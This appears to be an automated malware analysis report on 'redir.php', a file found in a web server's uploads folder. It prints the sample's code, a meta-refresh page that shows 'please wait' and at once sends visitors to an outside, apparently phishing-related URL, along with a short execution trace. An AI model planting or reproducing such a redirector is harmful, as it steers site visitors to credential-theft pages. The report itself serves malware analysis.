PHP Malware Analysis

redir.php

md5: 3be67b9e77e2681277239f2ca561528a

Jump to:

Screenshot

No Image

Attributes

URLs


Deobfuscated PHP code


<!DOCTYPE html>
<html>
<head>
  <meta http-equiv = "refresh" content = "0; url = https://grupopistacho.com/nuevobbv/1.html" />



</head>
<body>
<h3>Aguarde por favor...</h3>

</body>
</html>

Execution traces

data/traces/3be67b9e77e2681277239f2ca561528a_trace-1676241450.1172.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:37:56.015043]
1	0	1	0.000256	393512
1	3	0	0.000303	393288	{main}	1		/var/www/html/uploads/redir.php	0	0
1	3	1	0.000322	393288
			0.000357	314224
TRACE END   [2023-02-12 20:37:56.015219]


Generated HTML code


Original PHP code


<!DOCTYPE html>
<html>
<head>
  <meta http-equiv = "refresh" content = "0; url = https://grupopistacho.com/nuevobbv/1.html" />



</head>
<body>
<h3>Aguarde por favor...</h3>

</body>
</html>